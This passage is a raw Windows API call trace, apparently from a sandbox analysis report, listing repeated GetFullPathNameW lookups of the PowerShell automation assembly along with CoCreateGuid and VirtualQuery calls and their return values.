Data3=0x4590, Data4=([0]=0x9a, [1]=0x9f, [2]=0x29, [3]=0xc5, [4]=0x1, [5]=0x60, [6]=0x71, [7]=0xaf))) returned 0x0 [0062.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.662] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x57f8ca8d, Data2=0x83e7, Data3=0x4728, Data4=([0]=0x9a, [1]=0x5b, [2]=0x6b, [3]=0xba, [4]=0xf4, [5]=0x35, [6]=0x7c, [7]=0x86))) returned 0x0 [0062.663] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xbde79cc6, Data2=0xd7ec, Data3=0x4f6a, Data4=([0]=0xa6, [1]=0xf1, [2]=0x47, [3]=0xdb, [4]=0xbf, [5]=0x20, [6]=0xc7, [7]=0x4d))) returned 0x0 [0062.663] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xc10c441d, Data2=0xe610, Data3=0x4709, Data4=([0]=0xbb, [1]=0xd4, [2]=0x9c, [3]=0xf9, [4]=0x41, [5]=0xbd, [6]=0xad, [7]=0x43))) returned 0x0 [0062.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.664] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x6746eb1, Data2=0x2699, Data3=0x43e0, Data4=([0]=0xab, [1]=0x37, [2]=0x2f, [3]=0x37, [4]=0xf4, [5]=0x68, [6]=0xa, [7]=0x52))) returned 0x0 [0062.664] VirtualQuery (in: lpAddress=0x24b370, lpBuffer=0x24c230, dwLength=0x30 | out: lpBuffer=0x24c230*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.665] VirtualQuery (in: lpAddress=0x24b370, lpBuffer=0x24c230, dwLength=0x30 | out: lpBuffer=0x24c230*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.665] VirtualQuery (in: lpAddress=0x24b400, lpBuffer=0x24c2c0, dwLength=0x30 | out: lpBuffer=0x24c2c0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.665] VirtualQuery (in: lpAddress=0x24b370, lpBuffer=0x24c230, dwLength=0x30 | out: lpBuffer=0x24c230*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.665] VirtualQuery (in: lpAddress=0x24b400, lpBuffer=0x24c2c0, dwLength=0x30 | out: lpBuffer=0x24c2c0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.666] VirtualQuery (in: lpAddress=0x24b370, lpBuffer=0x24c230, dwLength=0x30 | out: lpBuffer=0x24c230*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.666] VirtualQuery (in: lpAddress=0x24b400, lpBuffer=0x24c2c0, dwLength=0x30 | out: lpBuffer=0x24c2c0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.667] VirtualQuery (in: lpAddress=0x24b370, lpBuffer=0x24c230, dwLength=0x30 | out: lpBuffer=0x24c230*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.667] VirtualQuery (in: lpAddress=0x24b400, lpBuffer=0x24c2c0, dwLength=0x30 | out: lpBuffer=0x24c2c0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.667] VirtualQuery (in: lpAddress=0x24b370, lpBuffer=0x24c230, dwLength=0x30 | out: lpBuffer=0x24c230*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.667] VirtualQuery (in: lpAddress=0x24b400, lpBuffer=0x24c2c0, dwLength=0x30 | out: lpBuffer=0x24c2c0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.668] VirtualQuery (in: lpAddress=0x24b370, lpBuffer=0x24c230, dwLength=0x30 | out: lpBuffer=0x24c230*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.668] VirtualQuery (in: lpAddress=0x24b400, lpBuffer=0x24c2c0, dwLength=0x30 | out: lpBuffer=0x24c2c0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.668] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.669] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.669] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.669] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.670] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.670] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.670] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.670] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x61398aeb, Data2=0xef91, Data3=0x4e7e, Data4=([0]=0xb7, [1]=0x71, [2]=0xb8, [3]=0xb9, [4]=0x59, [5]=0x70, [6]=0x11, [7]=0xb4))) returned 0x0 [0062.670] VirtualQuery (in: lpAddress=0x24bc80, lpBuffer=0x24cb40, dwLength=0x30 | out: lpBuffer=0x24cb40*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.671] VirtualQuery (in: lpAddress=0x24bc80, lpBuffer=0x24cb40, dwLength=0x30 | out: lpBuffer=0x24cb40*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.671] VirtualQuery (in: lpAddress=0x24bd10, lpBuffer=0x24cbd0, dwLength=0x30 | out: lpBuffer=0x24cbd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.671] VirtualQuery (in: lpAddress=0x24bc80, lpBuffer=0x24cb40, dwLength=0x30 | out: lpBuffer=0x24cb40*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.671] VirtualQuery (in: lpAddress=0x24bd10, lpBuffer=0x24cbd0, dwLength=0x30 | out: lpBuffer=0x24cbd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.672] VirtualQuery (in: lpAddress=0x24bc80, lpBuffer=0x24cb40, dwLength=0x30 | out: lpBuffer=0x24cb40*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.672] VirtualQuery (in: lpAddress=0x24bd10, lpBuffer=0x24cbd0, dwLength=0x30 | out: lpBuffer=0x24cbd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.672] VirtualQuery (in: lpAddress=0x24bc80, lpBuffer=0x24cb40, dwLength=0x30 | out: lpBuffer=0x24cb40*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.672] VirtualQuery (in: lpAddress=0x24bd10, lpBuffer=0x24cbd0, dwLength=0x30 | out: lpBuffer=0x24cbd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.673] VirtualQuery (in: lpAddress=0x24bc80, lpBuffer=0x24cb40, dwLength=0x30 | out: lpBuffer=0x24cb40*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.673] VirtualQuery (in: lpAddress=0x24bd10, lpBuffer=0x24cbd0, dwLength=0x30 | out: lpBuffer=0x24cbd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.673] VirtualQuery (in: lpAddress=0x24bc80, lpBuffer=0x24cb40, dwLength=0x30 | out: lpBuffer=0x24cb40*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.673] VirtualQuery (in: lpAddress=0x24bd10, lpBuffer=0x24cbd0, dwLength=0x30 | out: lpBuffer=0x24cbd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.674] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.674] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.674] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.675] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.675] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.675] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.675] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.676] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xcd82dab2, Data2=0xc528, Data3=0x479a, Data4=([0]=0x91, [1]=0x44, [2]=0x75, [3]=0x4b, [4]=0x9d, [5]=0xa0, [6]=0x4b, [7]=0xf6))) returned 0x0 [0062.676] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.676] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.677] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.677] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.677] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.677] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.677] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.677] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.678] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.678] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.678] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, 